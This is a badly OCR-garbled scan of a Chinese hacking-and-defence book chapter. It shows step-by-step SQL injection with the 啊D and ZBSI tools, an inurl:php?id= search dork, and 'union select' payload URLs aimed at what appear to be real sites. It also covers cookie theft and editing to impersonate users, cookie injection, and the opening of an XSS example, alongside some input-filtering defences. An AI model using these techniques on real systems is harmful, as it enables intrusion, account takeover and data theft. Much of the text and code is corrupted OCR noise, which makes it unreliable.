http://naps. google. com. hkjmaps?newwindow=lasafe=strictahl=zh-CNAq=CdhpHonorBig aspX3FidX3Dhbav=on.2 











单 击 多 按钮 , 可 国 选中 一 个 注入 点 ， 单 击 
对 Cookies 进 行 修改 。 “SQL 注入 检测 ”按钮 。 
STEP06: 查看 检测 内 容 


四 ] 啊 D 注 入 工具 v2.32 增强 版 暗 组 技术 论坛 Http://www.darkst.com 





注入 连接 [http: /fm. hlsjp. com/CompllonorBig. asp?id=33 
» 国王 
扫描 注入 点 [rete | 疝 ee 内 客 | 
User 巴 userid 
命 news Es 咒 
SQL 注入 检测 


人 


L 
管理 六 口 检测 编号 “| use... | pas... | userid | 
1 161... 15ef.,.. | 180 



























































过 半 : [i=1 同 口 错误 时 停止 

















: 售 MSSQL 数据 库 显 错 模 式 ” 妆 SSQL 数据 库 ”全 Access 或 其 他 数据 库 
多 行 执行 [| 当前 权限 aa 当前 用 户 [ |] 


4 





可 以 查看 详 
细 的 检测 内 容 。 


贺 根据 需要 选择 字段 ， 
单 击 “ 检 测 内 容 ” 按 钮 。 


STEP07: 返回 主 春 面 


加 啊 D 注 入 工具 v2.32 增强 版 啼 组 技术 论坛 Http://www.darkst.com 


了 BR 


| 司 用 这 接 自 录 位 时 
fhttp:f/tieba baidu com/.. /adnin/ default. asp | 
http: //tiebs bai du com/count/ 








多 http://tieba bai du com/Databackup/ 

鳄 http://ti eba baidu com/manager/ 
http://tieba baidu. comffpv_adnminyadnin asp 
http: f/tieba baidu. com/connect/ 

人 http: //tiebe baidu con/adnin_ guanli/ 

SP htip://tieba baidu com/acct/login. asp 
http://tieba baidu com/bbs/adnin login asp 
Ohttp://tieba baidu. com/user/ 

http: /ftieba baidu comfadmin_yuzhiguloflogin asp 
A http://tieba baidu com/careerfocus/Login asp 
I http://tieba baidu. com/Ny-login. asp 

Ohttp: fitieba. baidu, com/UploadFile/ 
http://tieba baidu. con/nenager/adain. asp 





SA 

of http://tieba baidu comydenglu asp 
http://tieba baidu. com/soft_admin. jsp 
http://tieba baidu. com/webadmin. asp 
http://tieba baidu. com/123_admin. asp 

[of http://tieba bai du com/soft admin aspx 
of http://tiebe baidu. com/adminin. asp 

of htip://tieba baidu com/admin body. asa 
http://tieba baidu. com/a_admin. asp 
http://tieba baidu com/manage/login. asp 
http: /ftieba baidu com/login/Default. asp? 
[http:f/tieba baidu com/Admin SoftLink asp 














单 击 “管理 入 口 
检测 ”按钮 。 
STEP09: 成功 登录 


pox| esave “有 


右 击 一 个 入 口 ， 选 择 
“用 IE 打开 链接 ”命令 。 





四 
Jeng337 ”个 人 中 心 7 理 商 要 3 


LD 
0 


12121 全 吧 搜 索 训 积 招 案 。 折 纵 FS 加 进 这 和 本 








qq 
™ 
12121 吧 
个 人 由 中 
X 歌 起 莉 戏 
和 -SS 和 地主 0 wan bd Bnd 
GE jwRSM SN D2 Fo oj 供 院 必 戏 
ld Ea 并 
cy 
国 看 贴 固 图 片 ” 妈 稍 品 时 游戏 和 了 所 Q 


一 “至 证 节 《我 的 贴吧 我 代言 》 平 台 吧 形象 大 使 寺 技 活动 火热 开启 回归 
0 4 站 分 享 好 游戏 为 37wan 女 神 联 四 加 四 _ 女 褐 联 轩 _37wenj 现 而 游戏 


ee A 





容 内 自 有 如 如 家 ，4T 了 如 名 位 笑 天 


-全 


0 转贴 一 入 贴吧 深 仙 光 从 此 节 接 嘱 度 娘 还 记 需 大 明 者 峙 的 届 个 TAI9? $0 小 林村 四 








加 本 下 yen9337 
型 二 mm. 
一 ee 
9 转贴 一 入 贴吧 深 似 光 从 此 节 持 别 诬 忽 计 记 雪 大 撤 者 隆 的 形 个 TAD32? 会 


登录 成 功 后 
STERIE: 


显示 的 百度 贴吧 页 面 。 
I 全 员 登 录 ” 按 钮 


| 蜀 入 你 的 帐号 和 密码 进行 要 陆 ! 


Ah) 3 ee ， pr” 登陆 也 可 以 使 用 本 软件 的 


SQL 注入 检测 


管理 入 口 检测 


如 有 任何 疑问 ， 请 和 我 联系 ? 


























输入 登录 网 站 


的 地 址 。 
员 身 份 登 录 该 网 站 。 











网 站 攻防 


STEP08: 打开 链接 网 页 





登录 


中 5 * 巴 


BR 了 训 | 襄 受 


加 彻底 解放 收藏 来 





下 次 自动 登录 忘记 密码 ? 


登录 





立即 注册 


可 以 使 用 以 下 方式 登录 


器 





输入 用 户 名 和 密码 。 国 单 击 “ 登 录 ” 接 钮 。 


STEP10: 


返回 主 界面 


[0] 啊 D 注 入 工具 v2.32 增强 版 暗 组 技术 论坛 Http://www.darkst.com 


注入 检测 


中 


扫 摘 注入 点 
sqL 注 入 检测 | 
AN 


管理 六 口 检测 





消息 (1) Y 。 贴吧 手机 客户 汕 ”百度 首页 


图 BE 视频 地 图 百科 文 座 


O 





WO 斗牛 
棋牌 游戏 


vy 
es -四 御 在 就 元 

















单 击 “ 








浏览 


页 ”按钮 可 快速 


浏览 该 网 贝 。 


STEPT1Z: 新 用 户 进 行 注 册 


D| 啊 D 注 入 工具 v2.32 增强 版 暗 组 技术 论坛 Http://www.darkst.com 


SQL 注入 检测 


管理 入 口 检测 








(大 于 等 于 6 位 数 ) 
| 喀 玛 不 能 为 空 ) 





确认 密码 








密码 保护 问题 | 您 最 喜欢 的 明星 是 谁 ? 


(必须 和 "密码 “相同 ) 
加 





您 的 答案 | 





( 找 回 密码 时 要 用 到 ) 














http: be baidu.com/12121%20%61%6E%64%209%31%63 中 %32 





输入 用 户 名 和 密码 , 单 ” 单 击 “ 用 户 注册 ”标签 ， 填 写 注册 信息 并 单 击 “ 马 
击 “ 登 录 ” 按钮 ， 即 可 以 会 ”上 注册 ”按钮 。 
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分 公 公公 
STEP13: 返回 主 界 面 























ED 
主 册 表 读 取 





























CNWD/ 上 传 
» . 


sg 
注册 表 读 取 


ebShell 管 理 





























http es baidu.com/1212196209661966E%64%209631963D9632 


用 户 若 拥有 一 个 SA 权限 的 数据 库 ， 就 可 以 在 这 
里 执行 CMD 命 令 或 上 传 一 些 脚 本 等 小 文件 。 


le 注入 “设置 ” 


四 啊 D 注 入 工具 v2.32 增强 版 暗 组 技术 论坛 Http://www.darkst.com 





1 


EGR 
.多 P. 呈 总 吕 后 和 








a oe 

admin/ admin. asp 
adninfadnin_ login. asp 
snin/loein sp 




















KRKKKRRKRKRRSSK <<I< 
PER 


























i baidu.com/121219%20%619%6E%64%20%31%3D%32 
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Im 
全 攻防 从 入 门 到 精通 


单 击 “ 目 录 查看 ”按钮 。 


国 输入 要 注入 的 网 站 地 址 并 单 击 “检测 ”按钮 。 


选择 目标 磁盘 并 单 击 “ 开 始 检测 ”按钮 ， 即 可 
查看 网 站 的 物理 目录 ( 只 有 MSSQL 数 据 库 才 能 
查看 ) 。 


STEP15: 单 击 “注册 表 读 取 ” 按钮 


回 啊 D 注 入 工具 v2.32 增强 版 蚁 组 技术 论坛 Http://www.darkst.com [oh 


注 、 愉 则 | 注入 这 oo 


5 [ay_LDCAL_IACHDIE 辐 SYSTEM\Contr rolSet001\Servi ces\W3SYC\ParametersAyirtual Kool [ 画 ]| 
[注册 表 读 取 表 - ES 有 -| ] 内 容 | 

















说 明 
回 %F8 目 录 位 置 





























[7 baidu. 1.com/12121%20%61%6E%64%20%31%3D%32 


单 击 “ 读 取 ” 按 钮 ， 即 可 读 取 注册 表 的 键 值 来 确定 
物理 目 录 等 信息 /oo 


单 击 “设置 ”按钮 。 


对 SOL 的 管理 入 口 、 表 段 、 字 段 等 内 容 进 行 设置 
也 可 添加 一 些 自己 要 检测 的 内 容 。 因 为 有 些 需 
猜 解 的 表 名 或 字段 里 面 是 可 能 不 存在 的 ， 只 能 在 
这 里 添加 。 


< 第 16 章 
网 站 攻防 


16:1.3 对 \ 人 注入 漏洞 的 防范 


SQL 注入 攻击 的 危害 性 比较 大 ， 现 在 已 经 痰 和 章 影响 到 程序 的 安全 ， 所 以 必须 从 网 站 设 
计 开 始 来 防御 SQL 注入 漏洞 的 存在 。 在 防御 SQL 注入 攻击 时 ， 程 序 员 必须 注意 可 能 出 现 
安全 漏洞 的 地 方 ， 其 关键 所 在 就 是 用 户 数 据 输入 处 。 

1. 对 用 尸 输入 的 数据 进行 过 滤 

目前 引起 SQL 注入 的 原因 是 程序 员 在 编写 网 站 程序 时 对 特殊 字符 不 完全 过 滤 。 造成 这 
样 的 现象 还 因为 程序 员 对 脚本 安全 没有 足够 的 意识 或 者 考虑 不 周 。 香 见 的 过 泪 方 法 有 基础 
过 滤 、 二 次 过 滤 以 及 SQL 通用 防 注 入 程序 等 多 种 方式 。 

(1) 基础 过 派 与 二 次 过 洲 

在 SQL 注入 入 侵 前 ， 需 要 在 可 修改 参数 中 提交 “””“and” 等 特殊 字符 来 判断 是 个 存 
在 SQL 注入 漏洞 ;而 在 进行 SQL 注入 攻击 时 ， 需 要 提交 包含 “;”“--”“update”“select” 
等 特殊 字符 的 SQL 注入 语句 。 所 以 要 防范 SQL 注入 ， 需 要 在 用 户 和 输入 或 提交 变量 时 ， 对 
单 引号 、 双 引号 、 分 号 、 逗 号、 上 骨 号 等 特殊 字符 进行 转换 或 过 滤 ， 以 减少 SQL 注入 漏洞 存 
在 的 可 能 性 。 下 面 是 一 个 ID 变量 的 过 滤 性 语句 : 













































































if instr(request(“id’”),”,”)>0 or instr(request(“id”),”insert”)>or 1nSstr (edGuest 
(“id”),”;”)>0 then response.write” 

<SCRIPT language=javascript> 

"avaseript history.ge (=1.): 

</SCRIPT> 

response.end 


end 1f 


使 用 上 述 代码 可 以 过 滤 ID 参数 中 的 “;”“,” 和 “insert” 凶 从 。 如 果 在 ID 参数 中 包含 
有 这 几 个 字符 ， 则 会 返回 错误 页 面 。 但 危险 字符 远 不 止 这 几 个 ， 要 过 滤 其 他 字符 ， 只 需 将 
危害 学 符 加 入 上 和 面 的 代码 即 可 。 一 般 情况 下 ， 在 获得 用 户 提 交 的 参数 时 ， 首 先 要 进行 一 些 
基础 性 的 过 小 ， 然 后 根据 程序 相应 的 功能 以 及 用 户 输入 进行 二 次 过 小 。 

(2) 使 用 SQL 通用 防 注入 程序 进行 过 小 

通过 手工 的 方法 对 特殊 字符 进行 过 小 难免 会 留 下 过 滤 不 严 的 漏洞 。 而 使 用 “SQL 
通用 防 注 入 程序 ”可 以 全 和 面 地 对 程序 进行 过 小 ， 从 而 很 好 地 阻止 SQL 脚本 注入 漏洞 
的 产生 。 

将 从 网 上 下 载 的 “SQL 通用 防 注入 程序 ”存放 在 日 己 网 站 所 在 的 文件 夹 中 ， 进 行 简单 
的 设置 后 束 可 以 很 轻松 地 帮助 程序 员 防 御 SQL 注入 ， 这 是 一 种 比较 秒 单 的 过 滤 方 法 。 访 程 
序 全 面 处 理 通过 POST 和 GET 两 种 方式 提交 的 SQL 注入 ， 并且 日 定义 需要 过 滤 的 字符 串 。 
当 黑 客 提 交 SQL 注入 危险 信息 时 ， 它 束 会 目 动 记录 黑客 的 卫 地 址 、 提 交 数 据 、 非 法 操作 
等 信息 。 其 使 用 步骤 如 下 。 
STEP01: 将 下 载 的 “SQL 通用 防 注 入 程序 ”压缩 包 解 压 后 ， 可 以 看 到 该 程序 主要 包含 
Neeao Sqlin.Asp、Neeao sqi admin.asp 和 Sql.mdb 这 3 个 文件 。 
































STEP02: 将 其 复制 到 网 站 所 在 的 文件 夹 中 ， 在 需要 防 注 入 的 页 面 尖 部 加 入 “<!--#include 
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EA 





取 PR > 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


file="Neeao_Sqlin.Asp"-->” 代 码 ， 即 可 在 该 页 面 防御 SQL 注入 。 除 对 用 户 提交 的 参数 和 
变量 进行 过 滤 外 ， 也 可 以 直接 限制 用 户 可 输入 的 参数 ， 因 为 只 允许 提交 有 限 的 字符 远 比 过 
小 特定 的 字符 更 为 安全 ， 


如 采 要 想 使 整个 网 站 都 可 以 防 注入 ， 则 可 在 数据 文件 (一 般 为 conn.asp ) 


中 如 入 “<!--#include file="Neeao SqlIn.Asp"-->” 代 码 ， 即 可 在 任意 页 面 中 调用 
提示 。 防 注 入 程序 


(3) 在 PHP 中 对 参数 进行 过 滤 








使 用 PHP el php.ini， 在 该 文件 中 可 对 PHP 进行 安全 
设置 。 以 安全 模式 打开 php.ini 文件 的 ， 分 别 设置 “safe mode=On” 和 “display errors=off”。 
因为 如 果 显 示 PHP 执行 错误 信息 的 display_errors 属性 打开 的 话 ， 驶 会 返回 很 多 可 用 信息 ， 
这 样 黑客 就 可 以 利用 这 些 信息 进行 攻击 。 

另外 ， 访 文件 还 有 一 个 重要 的 属性 magic quotes _gpc， 如 果 将 其 设置 为 On，PHP 程序 惑 
会 目 动 将 用 户 提 交 含 有 和” ” ”等 特殊 字符 的 数据 ， 转 换 为 含有 反 和 斜 线 的 转 义 字符 。 该 
属性 与 ASP 中 参数 的 过 滤 关 似 ， 它 可 以 防御 大 部 分 字符 型 注入 攻击 。 

2. 使 用 专业 的 漏洞 扫描 工具 

企业 应 当 投 资 于 一 些 专业 的 漏洞 扫 朱 工具， 如 Acunetix 的 Web 涯 洞 扫 揪 程 序 等 。 一 个 
完善 的 漏洞 扫 摘 程序 可 以 专门 查找 网 站 上 的 SQL 注入 式 漏洞; 而 程序 员 应 当 使 用 漏洞 扫 摘 
工具 和 站 点 监视 工具 对 网 站 进行 测试 。 

3. 对 重要 数据 进行 加 密 

采用 加 密 搁 术 对 一 些 重要 的 数据 进行 加 密 ， 比 如 用 MD5 加 密 ，MDS5 没有 反问 算法 ， 
也 不 能 解密 ， 就 可 以 防范 对 网 站 的 危害 了 。 


16.2 ZBSI 检 测 注 入 拟 曝光 


ZBSI 是 一 款 PHP 注入 辅助 工具 。 使 用 该 工具 可 检测 PHP 网 站 中 是 否 存 在 注入 漏洞 和 
字段 数目 ， 还 可 将 其 作为 一 个 浏览 器 来 打开 指定 的 网 页 。 
使 用 ZBSI 检测 注入 点 的 过 程 曝 光 如 下 。 




































































开 百 度 搜索 TEROZ: 并 运行 ZBSIV 
STEP01: 打开 百度 搜索 S : 并 运 针 
= © ln cy 一 一 一 
(€) http://www.baiducom/srie 只 - CX 上 图 inurttpnpria=) 百度 玖 和 | 站 | dy 1 
人 各 ~ -思量 ”REp)- 安 人 ~- IROv 和 -四 见 史 加 中 设 回 国 
8900 MHRng337 ”五 级 | 个 人 中 心 ” | 控 索 设 吐 | 百度 首页 
Bai 人 百度 新 间 网 贴吧 知道 音乐 图 片 视频 地 图 文库 更 多 。 
inurt(php?id=) SSB we:nsnmimetse 
; 4 , 注 共 朴 官 方 网 站 * 想 在 此 推广 你 的 产品 吗 ? en 
[图 文 】 安 全 性 的 大 得 可以 使 幅 吕 更 安全 ,于 议 您 定期 更 挤 密 码 ;密码 的 长 度 超过 6 位 以 上 ;不 要 A | 吕 ss 
有 简单 孝 字 排 作为 本 :用 字母 和 数字 、 痊 央 字符 的 组 合 来 增加 几 号 5 
sh lezi.coryaff#_sh...php?id=51047 2011-04-20 ~ - 百度 快 星 
了 二 让 被 封 停 网 络 服务 在 线 投诉 | 
游戏 在 那天 进行 更 新 诗 允 玩 容 站 QI 8 抽奖 。 原 本 良 钥 子 只 会 显 、3 个 这 | 
人 a dg er 开本 0 天 的 | 
php 百度 快 如 览 << >> 
乔布斯 符 职 
ee 25 钻 - 图 为 蔷 全 el 一 起 。( 新 浪 科 技 本 图 ) 图 为 苹果 前 C 
me 报道 3 8 月 25 日 消息 . 招 国 外 
www binewsli 2011-08-25 .百度 快照 
Ee 
常 集团 公司 的 正确 领导 和 大 力 支持 下 ,近年 来, 健康 药 北 步 入 快 
em nl nm 5 NTT 北京 同仁 堂 健康 药 业 股份 
百度 快照 
广东 -统一 如 这 八 9% 
] 昨日 省 府 人 省 内 名 次 公 路 收费 标 i 准 统 一 ,收费 费 率 全 部 统一 为 四 a 无 效 小 二 : http:#ihibaidu.com/pespin 
索 网 有 ”字符 的 网 页 索 查看 该 网 
搜索 网 址 中 含 php? Id= TOV | 输入 搜索 到 的 网 二， 国 坦 ; 的 网 址 ， 02 查看 该 该 网 站 是 否 


= “检测 注入 ”按钮 。 ee 
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STEP03: ”查看 猜 解 到 的 字段 STEP04: 查看 含有 猜 解 到 字段 的 网 址 


we ZBSI V1.0 【PHP 注 














http:// wy.zzb.sdu.edu.cn/shilan/article.php?id=5725/*/and/™/1=1 

http: AAAwww.zzb.sdu.edu shiian/article.php?id=5725/"/and/ /1=2 

恭喜 ， 可 以 进行 PHF 注 入 

http'AAwww.zzb.sdu.edu. Ca php?d=57257™*/and/™/1=1/™ /union/™/select/™/ 

http: /wvwany.zzb.sdu.edu.cn/shiianvarticle.php ?d=5725/*/and/®/1=1/™ /union/™ /select/ /1.2.37* 
http: dwww.z2b.sdu.edu.cn/shiian/article. php?id=57257™/and/®™/1=1/™ /union/™/select/™/1,2,3,41" 
http: dw zzb.sdu.edu.cn/shilianarticle. php?id=57257°"/ and/®™/1=1/™ /union/™ /select/™/1.2.3.4.57 














首 页 组 织 机 构 车 要 活动 通知 公告 基层 动态 工作 简报 学 习 参 考 在 线 文件 领导 讲话 经 验 交 流 





无 敌 小 龙 : http:/4hibaidu.com/pespin 


单 击 “ 字 段 数目 ”按钮 ， 可 看 到 猜 解 得 到 的 字段 数 国 将 一 个 可 注入 的 单 击 “ 浏 览 ”按钮 ， 
目 。 网 址 复制 到 此 处 。 ” ”可 看 到 含有 猜 解 到 字段 
的 网 址 。 


STEP05: 查看 其 他 网 址 








2 shilian/ article. php ?id=5725/"™ Jand/”™/1=1/™ /union/™/select/™ /123 3.4/ 
http: /www.22b. 3 6 cn/shilian/article. php?id=5725/™ /and/™/1 non /selec =/ 2345/ 


在 “网 站 地 址 ”文本 框 中 输入 要 浏览 的 网 页 地 址 
后 ， 单 击 “ 浏 览 ” 按 钮 ， 可 浏览 相应 的 网 页 。 














热 搜 : tds 天 使 之 和 竺 极 = 国 微笑 在 我 必 排行 榜 高 级 搜索 


四 川 康定 县 因 暴 雨 引 发 泥石流 
省 道 211 线 多 处 中 断 ， 道 路 被 湾 通 讯 不 
”四 i 人 失踪 





无 天 小 龙 : http:Wihibaidu com/pespin 


在 墨客 横行 时 ， 如 何 实现 目 己 PHP 代码 安全 ， 并 保证 程序 和 服务 器 的 安全 ， 征 一 
个 很 重要 的 问题 。 在 编写 PHP 代码 时 ， 对 变量 进行 初始 化 和 过 小 ， 可 以 有 效 防御 PHP 
Ns 


主 入 攻击 曝光 


在 Windows 7 中 ，Cookie 的 存放 位 置 是 C:\Users\Administrator\AppData\Local\ 
Microsoft\Windows\Temporary Internet FilesS\。 黑 客 只 要 把 别人 的 Cookie 信息 问 服 务 
颖 提交 ， 通 过 验证 束 可 以 冒充 别人 来 登录 论坛 或 网 站 ， 这 束 是 Cookie 欺骗 的 基本 
原理 。 


16.3 
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ST IF 一 一 


售 人 他 他 


攻防 从 入 门 到 精通 





10.3.1 IEC00kKiesView 搜寻 (00kie 文件 数据 曝光 


IECookiesView 是 一 于 可 以 搜寻 并 显示 出 本 地 计算 机 中 所 有 Cookie 文件 的 数据 ， 包 
括 哪 一 个 网 站 写 入 Cookie、 写 入 的 时 间 日 期 及 此 Cookie 的 有 效 期 限 等 信息 。 通 过 该 软 
件 ， 黑 客 可 以 很 轻松 地 读 出 目标 用 户 最 近 访 问 过 哪些 网 站 ， 甚 全 可 以 任意 修改 用 户 在 该 
网 站 上 的 注册 信息 。 但 此 软件 只 对 下 浏览 器 的 Cookie 有 效 。 使 用 IECookiesView 的 过 
程 颇 光 如 下 。 


STEPO1: 








运行 IECookiesView STEP02: 查看 Cookie 信息 


st ng\Microsoft\Windows\Coo... ec-nlal= lel] 
Fle Edit View Options 
| 由 生 四 回国 x 敬 国 鳞 人 时 恒 

Web site / Accessed Date Modified Date Created Date ^ 
口 得 163.com 2013/11/12 9:51;..， 2013/11/12 9:51:;. 2013/11/12 SE 


Fle Edit View Options Help 

| 的 名 口 目 加 XX 昌 团 改 学 儿 

Web site / Accessed Date Modified Date Created Date ^ 
口 各 163.com 2013/11/12 9:51:. 2013/11/12 9:51:.. 2013/11/12 q 











口 清 360.cn 
口才 51buy.com 


口 各 acookietaobao.com 


I 口 te acs86,com 


2013/11/12 9:14:... 
2013/11/12 8:47: 
2013/11/11 0:59: 
2013/11/12 10:3... 


2013/11/7 8:33:52 
2013/11/12 8:47:... 
2013/11/11 0:41:... 
2013/11/12 10:3... 


2013/11/7 8:3 
2013/11/12 8: 
2013/11/11 0: 
2013/11/12 1 


口 信 51ibuy.com 


口 篇 acookie.taocobao.com 


口 i acs86.com 


2013/11/12 9:14:... 
2013/11/12 8:47:... 
2013/11/11 0:59: 

2013/11/12 10:3.. 


2013/71177 8:33:52 


2013/11/12 8:47:... 


2013/11/11 0:41: 
2013/11/12 10:3... 


2013/11/7 8:3 
2013/11/12 8: 
2013/11/110: | 
2013/11/12 1 


口 驶 sdmastercom.cn 
只 篇 adsametianiimedia.com 
€ 


2013/11/12 10:2... 2013/11/12 10:2.. 2013/11/12 1 
2013/11/11 18;0. 2013/11/11 18:0,. 2013/11/111:™ 
} 


| 口 各 admastercom.cn 
| 品 篇 adsametianiimediacom 
4 呵 


2013/11/12 10:2... 2013/11/12 10:2.. 2013/i1/12 1 
2013/11/11 18:0... 2013/11/11 18:0.. 2013/11/11 1;™ 
上 

















Domain Expiration Date Modifie Key / Value Domain Secure Expiration Date ec 
ww_aguid 132730903.994699... 360.cn 2015/3/22 8:33:52 2013/ 贡 


164cookiefles lcokie | | 
自动 扫描 驻 留 在 本 地 计算 机 IE 浏览 器 中 的 Cookie 文 任意 选中 一 个 Cookie， 可 查看 其 地 址 、 参数 以 及 过 
件 。 期 时 间 等 信息 。 绿 色 对 勾 表 示 该 Cookie 可 用 ， 红 色 
的 又 表示 该 Cookie 已 经 过 期 ， 无 法 使 用 。 























|164 Cookie Files 


STEP03: 对 Cookie 中 的 密 钥 和 值 进行 编辑 ”STEP04: 编辑 Cookie 属性 


a rr Ed The Content Of Coole 
File ii View Options Help | 
| 拒 盟 口 回 辐 X 昌 国 纪 过 客 笛 


Web site / 


Before editing the content of a cookie, you should close all windows of Internet Explorer in order to avoid a wiite 
conllict between |ECookieswiew and Internet Explorer You should also insure that you have the latest snapshot of 
the cookies list, by reloading the cookies files list in the top sub-window [F5) 





Accessed Date Modified Date Created Date ^ 


口 车 163.com 
回 入 360.cn 
口 或 51buycom 


口 伟 acookietacbaoc.com 


口 [> acs86.com 


2013/11/12 9:51:... 
2013/11/12 9:14:… 
2013/11/12 8:47:... 
2013/11/11 0:59: 

2013/11/12 10:3.… 


2013/11/12 9:51:... 


2013/11/7 8:33:52 


2013/11/12 8:47:... 
2013/11/11 0:41:... 


2013/11/12 10:3... 


2013/11/12 SE 


2013/11/7 8:3 
2013/11/12 8: 
2013/11/11 0: 
2013/11/12 1 





Key: [_guid 
132730903.994699925480815500.1383784432382.87 


口 得 admastercom.cn 
口 仿 adsametianiimedia.com 
4 Mm 


2013/11/12 10:2... 2013/11/12 10:2... 2013/11/12 1 
2013/11/11 18:0... 2013/11/11 18:0.. 2013/11/11 1;™ 
上 








Domain: 


Domain Expiration Date Modifie Secure: 


2015/3/22 8:33:52 2013/11 ES 
Expire: 2015/ 3/22 国 ~ 8:33:52 | 


Modified: 








2013/1/ 7 国 v | | 8:33:52 启 











Modify Cookie 


4 | 
164 Cookie Files 1 Cookie(s) 


右 击 某 个 键 值 ， 
命令 。 “Modify Cookie” 按钮 。 





选择 “Edit The Cookie:s Content” 对 该 Cookie 的 各 个 属性 进行 重新 设置 并 单 击 
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STEP05: 返回 主 春 面 STEP06: 登录 Cookie 对 应 网 址 

















Accessed Date Modified Date Created Date ^ 
2013/11/12 9:51:.。 2013/11/12 9:51:.。 2013/11/12 9: 
ma/11/12 9:14:.. 2013/11/7 8:33:52 | 
V11/12 8:47:.. 2013/11/12 8:47:. 2013/11/12 8: 
111/11 0:59:.. 2013/11/11 0:41:.。 2013/11/11 0: 
11/12 10:3. 2013/11/12 10:3.。 2013/11/12 4 
9 11/12 10:2. 2013/11/12 10:2.。 2013/11/12 1 
Open With Notepad 11/11 18:0. 2013/11/11 18:0. 2013/11/111:7| 
Open With Wordpad 2 








Secure Expiration Date Modifie 
No 2015/3/22 8:33:52 2013/1 


Sort By Selection 


Choose Columns 
Find 


Select By Domain or Web Site 
Select highlighted items 
Deselect highlighted lterhs 
Select All Hems 

Deselect All Hems 























右 击 某 个 Cookie， 在 快捷 菜单 中 选择 “Open Web ”IE 浏览 器 就 利用 保存 的 Cookie 信息 自动 登录 相应 
Site 命令 。 的 网 址 。 


这 样 ， 污 客 束 利用 这 些 不 起 眼 的 Cookie 信息 成 功 获 得 他 人 的 隐私 信息 ， 还 可 以 在 论坛 
中 冒 用 别人 名 义 发 表 帆 子 。 


10.3.2 《00kie 注入 星光 


现在 很 多 网 站 都 采用 了 通用 防 注入 程序 ， 对 于 这 种 网 站 可 采用 Cookie 注入 的 方法 ， 而 
很 多 通用 防 注入 程序 对 这 种 注入 方式 都 没有 防备 。 

在 ASP 中 ，request 对 象 获取 客户 问 提 交 数 据 和 常用 get 和 post 两 种 方式 ， 同 时 ，request 
对 象 可 以 不 通过 集合 来 获得 数据 ， 即 直接 使 用 “request(name”。 但 它 效 率 低 下 ， 容 易 出 
错 ， 当 和 湖 略 具体 的 集合 名 称 时 ，ASP 是 按 QueryString(get),Form(post),Cookie,Severvariable 
集合 的 顺序 来 搜索 的 。 而 Cookie 是 保存 在 客户 闹 的 一 个 文本 文件 ， 可 对 其 进行 修改 ， 利 用 
Request.cookie 方式 来 提交 变量 的 值 ， 从 而 实现 注入 攻击 。 其 格式 为 : 























Response.Cookies["uid"]. Value = uid; 


Cookie 记录 了 用 户 的 ID 号 ， 当 需要 用 到 UID 时， 就 通过 Cookie 搜索 用 户 信 息 。 使 用 
到 的 ASP 代码 如 下 : 








if (Reduest .Cookles["ulidq"] !=null) 
uid=Request.Cookies["uid"] .value; 
string str="select * from userTable where id="+uid,; 


} 


只 要 通过 专门 的 Cookie 修改 工具 (如 IECookiesView) 把 Cookies["uid"] 的 值 改 成 “40 
or 1=1” 或 其 他 注入 代码 ， 就 可 以 实现 Cookies 注入 攻击 了 。 另 外 ， 还 可 通过 Cookie 注入 
工具 直接 注入 ,“COOKIES 注入 器 ”就 是 其 中 最 常见 的 一 球 。 

“COOKIES 注入 器 ”可 以 快速 生成 注入 的 ASP 脚本 ， 其 界面 如 下 图 所 示 。 
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于 
新 
靳 


ee > 
FZ sm 
会 人 电导 性 


CO0EIES 广 入 露 By: 学 | XX 












http://127.0.0.1/heisu. asp 
http Hl27.0.0.1/heisuy. asp 


来 福地 址 : 
ASPSESSIDONIDAQACTAQB=HEFHJOPDOMAIKGMPGBJJDELT:; 


COOKITES 水 据 





设置 各 个 属性 之 后 ， 单 击 “ 生 成 ASP ”按钮 ， 会 台 
出 对 话 框 提 示 “ 文 件 成 功 生 成 ， 单 击 “ 确 定 ” 按 
钮 ， 即 可 快速 生成 注 六 文件 。 


数据: [euexi=0012 生成 ASF 


爱国 者 寅 全民 
WwWw.3800hk_ com 


] 娘 坟 3 


[黑客 基地 ]】 【 骇 容 基 t 


2 


如 要 预防 Cookie 注入 的 发 生 ， 只 要 在 获得 参数 UID 后 ， 对 其 进行 过 滤 ， 通 过 创建 一 
个 类 来 判断 数字 参数 古人 否 为 数 子 ， 其 代 公 如 下 : 





1If (Request.Cookies["uid"] !=null) 

{ 
uid=Request.Cookies["uid"] .value; 
lsnumeric cooidesID = new lisnumeric();) 
if (cooidesID.reIsnumeric (ruid)) 


{ 


string str="select * from userTable where id="+uid,; 


} 


其 中 “isnumeric cooidesID = new isnumeric();” 语 句 的 作用 是 创建 一 个 类 ， 再 使 用 一 个 
判断 语句 “if (cooidesID.reIsnumericGruid))” 来 判断 数字 参数 是 否 为 数字 ， 如 果 是 数字 ， 则 
执行 “string str="select * from userTable where id="+uid; ”代码 行 对 获得 的 参数 进行 过 滤 。 


16.4 ”路 站 脚本 攻击 曝光 


跨 站 攻击 是 指 入 侵 者 在 远程 Web 页 面 的 HTML 代码 中 插入 恶意 数据 ， 使 得 用 户 认为 
该 页 面 是 可 信赖 的 ， 但 是 当 浏览 右 下 载 该 页 和 时 ， 佣 入 其 中 的 脚本 将 被 解释 执行 。 正 是 这 
种 被 称 为 “鸡尾酒 钓鱼 本” 的 手段 使 商务 网 站 的 可 信和 度 大 大 降低 ， 由 于 用 尸 访问 的 是 真正 
的 商务 站 点 ， 因 此 很 难 想到 夏 实 网 站 也 会 暗藏 杀 机 。 本 市 介绍 跨 站 脚本 攻击 ， 并 以 一 个 留 
言 本 的 漏洞 来 讲述 如 何 利用 与 防御 路 站 脚本 漏洞 。 


























16.4.1 简单 留言 本 的 跨 站 漏洞 
本 小 节 将 以 迷你 留言 本 为 例子 进行 跨 站 脚本 攻击 的 讲解 。 留 言 本 的 体积 很 小 ， 代 码 不 
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多 ， 适 合用 来 分 析 ， 并 且 迷 你 留言 本 的 安 状 很 简 蛙 ， 从 网 上 下 载 迷你 留言 本 的 压缩 包 后 直 
接 解压 到 IIS 的 目录 中 孢 可 以 使 用 了 。 安 猴 完 成 后 的 运行 界面 如 下 图 所 示 。 











* vir| 国 . 
或 益 轨 - 剧 直通 手机 罗 游 戏 ” 网 豆 好 下 家 





昵称 ， aaa 女 














下 面 看 看 这 个 留言 本 是 如 何 显示 留言 的 ， 用 记事 本 打开 index.asp 页 面 的 代码 ， 显 
示 如 下 : 


<table border="0" cellpadding="0" cellspacing="1" width="64%" height="51" 
style="word-break: break- all; border: lpt dotted plack"> 
<tr> 
<td align=center> 
<img border=0 src=images/face/face<%=rs ("face")%>.gif> 
< Ed> 
